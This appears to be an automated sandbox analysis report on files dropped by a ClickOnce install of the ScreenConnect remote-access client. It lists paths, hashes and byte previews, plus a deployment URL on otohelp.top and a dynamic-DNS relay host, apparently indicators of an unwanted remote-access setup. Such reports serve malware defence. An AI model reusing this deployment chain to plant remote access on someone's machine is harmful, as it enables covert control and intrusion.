File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.042876835377422
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81v7TVv/vXbAa3xT:2dL9hK6E46YPt8JFvH
MD5:	0AFFE6B30C1B82A04C5BD28A289F8FD0
SHA1:	3C7C11FCCC3CDF868A5171D5FAB96AA54F01779E
SHA-256:	509F9909D24F034B6CD5CED0019F6E91CFA526C4FB9F0F7DE7FA708792BEBB50
SHA-512:	E253E03AEBBA34599BDF410E2939F45ADF1C066A740F60E792EB25F356F56839C6A39E89BD56242948D6CA8E546F88D29FAAAB09B1C7168712AEAD83CE8BF950
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a25%3a37</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AYPVIQNL.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (613), with CRLF line terminators
Category:	modified
Size (bytes):	14920
Entropy (8bit):	3.806210504627678
Encrypted:	false
SSDEEP:	96:t6BKOdfqHgcNfUpUBBaOy0lZadfqHgcNEhU/Fhd/ivhvE880+0kkh0xL0fdfqHgH:WqHzoUaZqHz55YqHziGLEv
MD5:	70A21C83498DB75846400D7627505B90
SHA1:	60D4D0ABC4114C3365213A7F12A514CE13DC0042
SHA-256:	F065D6EF48C9AF51B5D2A23B92B944EC2871E379ABDA7D03340AD97552D16B4E
SHA-512:	C9B86F7D8F50DD4C1EB3E4A5654CDE321CF5B40C9E0AC77365A15A99CEB7CD34A79A94E9FC24710FFFAA9839519C1E3D188935CCEDF92C58EB4E60C1D271FF34
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.o.t.o.h.e.l.p...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.m.m.f.3.5.1...d.d.n.s...n.e.t.&.p.=.8.0.4.1.&.s.=.b.0.4.4.e.7.2.7.-.8.6.0.9.-.4.a.6.c.-.b.8.8.5.-.9.2.d.6.2.4.9.

C:\Users\user\AppData\Local\Temp\Deployment\1V1MM2OH.MZC\KYHO2NMQ.K0X.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	118084
Entropy (8bit):	5.584890162201507
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
MD5:	9F442D8293F1917B8CD6F007F3FEEBE6
SHA1:	3065E347263BFEA93CC987DF08E9630EBCF3E870
SHA-256:	CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
SHA-512:	58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
